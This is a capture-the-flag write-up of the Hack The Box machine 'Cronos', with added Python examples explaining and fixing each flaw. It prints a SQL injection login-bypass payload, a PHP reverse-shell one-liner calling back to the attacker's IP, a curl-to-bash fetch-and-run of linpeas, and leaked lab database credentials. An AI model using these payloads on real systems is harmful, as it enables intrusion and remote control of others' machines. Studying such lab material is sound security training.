Donald Ashdown

HTB Cronos

Summary

This was a great machine that did not involve anything too challenging or obscure, which I appreciated. It did, however, exercise a range of techniques: DNS enumeration, SQL injection, command injection and privilege escalation. DNS enumeration turned up new virtual hosts, one of which had a login form vulnerable to a SQL injection authentication bypass; behind it, command injection gave a user shell. From there I escalated to root with a kernel exploit identified via "uname -a", and also by a second path: replacing the "artisan" file that root was executing on a schedule.

Tools used
  • LinPEAS (linpeas.sh)

Processes/techniques
  • DNS enumeration with dig

  • Command injection leading to a reverse shell

  • Executing linpeas in memory: curl -s http://<ip>:<port>/linpeas.sh | bash

  • Replacing a file executed by a root cron job with a shell


Recon

Fairly straightforward: a DNS server and a web server.


Enumeration: DNS

I tried several DNS enumeration tools without any luck. In HTB the convention is to add the box's hostname to your /etc/hosts file and query the box itself as the nameserver. So, for good practice, I eventually added cronos.htb to /etc/hosts and re-ran the DNS enumeration, this time with many results.

We add all of these hosts to our /etc/hosts file:

10.129.30.241 admin.cronos.htb ns1.cronos.htb www.cronos.htb cronos.htb
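The write-up does not show the exact dig invocation. The usual one for this situation is a zone transfer against the box's own nameserver, `dig axfr cronos.htb @10.129.30.241`, and that is what the added example below assumes. It is not code from the original post: it parses dig's AXFR output (a constructed sample in dig's format, not a real capture) and produces the single /etc/hosts line shown above, so the result can be appended with `sudo tee -a /etc/hosts` instead of being typed by hand.

```python
"""Turn the A records of a dig zone transfer into /etc/hosts lines.

Added example, not part of the original write-up. Assumes the enumeration
was `dig axfr cronos.htb @10.129.30.241`; SAMPLE_AXFR is constructed output
in dig's format, not a capture from the box.
"""
from collections import defaultdict

# Constructed sample of what `dig axfr` prints, comment lines included.
SAMPLE_AXFR = """\
; <<>> DiG 9.18.12 <<>> axfr cronos.htb @10.129.30.241
;; global options: +cmd
cronos.htb.          604800  IN  SOA  cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.          604800  IN  NS   ns1.cronos.htb.
cronos.htb.          604800  IN  A    10.129.30.241
admin.cronos.htb.    604800  IN  A    10.129.30.241
ns1.cronos.htb.      604800  IN  A    10.129.30.241
www.cronos.htb.      604800  IN  A    10.129.30.241
cronos.htb.          604800  IN  SOA  cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 40 msec
"""


def axfr_a_records(text):
    """Yield (name, ip) for every A record in dig AXFR output."""
    for line in text.splitlines():
        if not line or line.startswith(";"):
            continue  # dig's comment and status lines
        fields = line.split()
        # name, ttl, class, type, rdata
        if len(fields) >= 5 and fields[2] == "IN" and fields[3] == "A":
            yield fields[0].rstrip("."), fields[4]


def hosts_lines(text):
    """One /etc/hosts line per address, apex name first, no duplicates."""
    by_ip = defaultdict(list)
    for name, ip in axfr_a_records(text):
        if name not in by_ip[ip]:
            by_ip[ip].append(name)
    lines = []
    for ip, names in sorted(by_ip.items()):
        names.sort(key=lambda n: (n.count("."), n))  # fewest labels (apex) first
        lines.append(f"{ip} {' '.join(names)}")
    return lines


if __name__ == "__main__":
    # Real use: dig axfr cronos.htb @10.129.30.241 | python3 this.py | sudo tee -a /etc/hosts
    for line in hosts_lines(SAMPLE_AXFR):
        print(line)
```

The filter keys on the record type, not on the name, so NS and SOA records (and the SOA dig repeats at the end of a transfer) are ignored; only A records end up in the hosts line.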

There was little on the main page, but the admin page had a login form.

A little SQL injection for the win!

Log in with: ' OR 1 -- -
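Why that payload gets you in: the login concatenates the submitted username into the query text, so `' OR 1 -- -` closes the string, adds an always-true condition, and comments out the password check. The example below is added here and is not code from the original post or from the target; the admin page's real backend is not shown, so an in-memory SQLite table with one constructed user stands in for it, and the payload is assumed to go in the username field.

```python
"""Why `' OR 1 -- -` logs you in, and how a parameterised query stops it.

Added example, not from the original write-up or the target. A throwaway
SQLite database with a constructed user stands in for the real login backend.
"""
import sqlite3

PAYLOAD = "' OR 1 -- -"  # the payload from the write-up, assumed to go in the username field


def make_db():
    """Constructed user table standing in for the target's login database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'not-the-real-password')")
    return db


def login_vulnerable(db, username, password):
    """String-built query: user input becomes part of the SQL grammar."""
    sql = (f"SELECT username FROM users "
           f"WHERE username = '{username}' AND password = '{password}'")
    # With PAYLOAD as the username the statement becomes:
    #   ... WHERE username = '' OR 1 -- -' AND password = 'x'
    # `OR 1` is always true and `-- ` comments out the password check.
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_fixed(db, username, password):
    """Parameterised query: the payload is compared as a literal string."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = db.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, PAYLOAD, "x"))  # admin
    print("fixed:     ", login_fixed(db, PAYLOAD, "x"))       # None
```

The trailing `-` after `--` is the usual habit for MySQL, where `--` only starts a comment when followed by whitespace; SQLite accepts `--` either way, so the same payload works in both.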

The page behind the login runs traceroute against a host you supply, and the input is not sanitised, so appending ;command runs a command of our choosing.

Reverse shell

I tried bash and netcat payloads; finally PHP worked. The reverse shell was appended to the traceroute target as 8.8.8.8;<payload>, with the payload below.

php -r '$sock=fsockopen("10.10.14.120",6363);exec("/bin/sh -i <&3 >&3 2>&3");'
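The flaw and its fix side by side, as an added example that is not code from the original post or from the target. The target's PHP handler is not shown, so a Python stand-in builds the command the way a vulnerable handler does (the host string spliced into a shell command) and beside it the hardened form (validate the input as an IP address, then pass it as a single argv element with no shell). `printf` stands in for `traceroute` so the demo runs offline and deterministically, and a harmless `echo` stands in for the PHP reverse shell; nothing here contacts 8.8.8.8.

```python
"""Command injection in the traceroute form: why `8.8.8.8;cmd` works, and the fix.

Added example, not from the original write-up or the target. `printf` stands
in for `traceroute`; DEMO_PAYLOAD stands in for the author's PHP reverse shell.
"""
import ipaddress
import subprocess

# Shape of the author's real input (not executed here): target, ';', second command.
AUTHOR_PAYLOAD_SHAPE = "8.8.8.8;php -r '...'"

DEMO_PAYLOAD = "8.8.8.8;echo INJECTED"  # harmless stand-in for the reverse shell


def run_vulnerable(host):
    """Vulnerable: the host string is interpolated into a shell command line."""
    cmd = f"printf 'traceroute to %s\\n' {host}"
    # With DEMO_PAYLOAD the shell sees two commands separated by ';'.
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def run_fixed(host):
    """Hardened: reject anything that is not an IP address, then pass it as one
    argv element with no shell, so ';' is never a command separator and a value
    starting with '-' can never be taken as a traceroute option."""
    ipaddress.ip_address(host)  # raises ValueError for anything that is not an IP
    argv = ["printf", "traceroute to %s\\n", host]
    return subprocess.run(argv, capture_output=True, text=True).stdout


if __name__ == "__main__":
    print(run_vulnerable(DEMO_PAYLOAD), end="")  # second output line: INJECTED
    print(run_fixed("8.8.8.8"), end="")
    try:
        run_fixed(DEMO_PAYLOAD)
    except ValueError as e:
        print("rejected:", e)
```

Dropping the shell is necessary but not sufficient: without the IP check a value such as `-m 1` would still reach traceroute as an option, which is why the fixed version validates before it executes.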


In the folder of the landing page we find credentials for a database:

admin
kEjdbRigfBHUREiNSDs

These led nowhere, so we moved on to local enumeration.


Privilege escalation

From here we use the usual linpeas to enumerate the target system. To avoid dropping the script on disk, we run linpeas from memory by piping it straight from our web server into bash.


curl -s http://10.10.14.120:8000/linpeas.sh | bash

Scrolling through the linpeas output, this stood out: linpeas highlights it in yellow, and root is running something from a user folder on a schedule.


I attempted to edit the artisan file and, after some time, had no luck. So I eventually deleted it and copied a PHP reverse shell into its place under the same name, and this gave me root access. Deleting and recreating works when the directory is writable even if the file itself is not, so check the directory permissions as well as the file's.
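The check a practitioner wants to automate here is "which root cron jobs run a file I can write to or replace". The example below is added and is not part of the original write-up: it parses /etc/crontab-style lines (schedule, user, command), extracts the script path behind an interpreter such as `php`, and tests whether the file or its parent directory is writable by the current user, the second condition being the one the author exploited by deleting and recreating `artisan`. The crontab text and the `artisan` file are constructed in a temp directory so it runs offline; the real job on the box is not reproduced.

```python
"""Find root cron jobs whose script the current user can overwrite or replace.

Added example, not part of the original write-up. The crontab and the
'artisan' file are constructed in a temp directory, not taken from the box.
"""
import os
import shutil
import tempfile

INTERPRETERS = {"php", "python", "python3", "perl", "bash", "sh", "ruby", "node"}


def parse_system_crontab(text):
    """Yield (user, command) for each job line in /etc/crontab format."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 6)  # 5 schedule fields, user, command
        if "=" in fields[0]:
            continue  # SHELL=..., PATH=... assignments
        if len(fields) == 7:
            yield fields[5], fields[6]


def script_path(command):
    """Absolute path of the script the job runs, skipping a leading interpreter."""
    for tok in command.split():
        if os.path.basename(tok) in INTERPRETERS:
            continue
        return tok if tok.startswith("/") else None
    return None


def hijackable(path):
    """Reason the job can be hijacked by the current user, or None."""
    if os.access(path, os.W_OK):
        return "file writable"
    if os.access(os.path.dirname(path), os.W_OK):
        return "directory writable (file can be deleted and replaced)"
    return None


def find_hijackable_root_jobs(crontab_text):
    """(path, reason) for every root job pointing at a file we control."""
    hits = []
    for user, command in parse_system_crontab(crontab_text):
        if user != "root":
            continue
        path = script_path(command)
        why = hijackable(path) if path else None
        if why:
            hits.append((path, why))
    return hits


def demo():
    """Constructed crontab pointing at a temp 'artisan' owned by us."""
    tmp = tempfile.mkdtemp()
    artisan = os.path.join(tmp, "artisan")
    open(artisan, "w").close()
    crontab = f"""\
# constructed /etc/crontab, not the real one from the box
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* * * * *       root    php {artisan} schedule:run >> /dev/null 2>&1
"""
    try:
        return find_hijackable_root_jobs(crontab)
    finally:
        shutil.rmtree(tmp)


if __name__ == "__main__":
    for path, why in demo():
        print(f"root job runs {path}: {why}")
```

On a real target, feed it `/etc/crontab` and the files under `/etc/cron.d/`; per-user crontabs have no user field and need the six-field variant, which is why linpeas is still the quicker first pass.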


There was also a kernel exploit that could have been identified with uname -a.

